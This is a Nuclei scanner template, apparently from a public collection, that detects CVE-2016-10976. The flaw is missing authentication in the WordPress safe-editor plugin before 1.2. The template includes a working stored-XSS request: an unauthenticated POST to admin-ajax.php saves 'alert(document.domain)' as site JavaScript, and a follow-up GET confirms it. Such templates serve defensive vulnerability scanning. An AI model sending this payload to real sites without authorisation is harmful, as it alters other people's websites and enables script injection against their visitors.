漏洞描述
The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.
id: CVE-2016-10976
info:
name: Safe Editor Plugin < 1.2 - CSS/JS-injection
author: Splint3r7
severity: medium
description: |
The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.
remediation: |
Update to the latest version of safe-editor plugin or apply the patch provided by the vendor.
reference:
- https://wordpress.org/plugins/safe-editor/#developers
- https://github.com/ARPSyndicate/cvemon
- https://nvd.nist.gov/vuln/detail/CVE-2016-10976
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-10976
cwe-id: CWE-79
epss-score: 0.02444
epss-percentile: 0.84645
cpe: cpe:2.3:a:kodebyraaet:safe_editor:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: kodebyraaet
product: safe_editor
framework: wordpress
tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=se_save&type=js&data=alert(document.domain)
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "alert(document.domain)", "save_edit_js")'
condition: and
# digest: 490a0046304402203e0d870eea69b18d410289e0d042c4b9de2128b39b47361d9ee2da38e6bfe6110220402b842d95139d17b48006d4ee8c8008800a0a3b4118c6579e6773c77f0f78c2:922c64590222798bb761d5b6d8e72950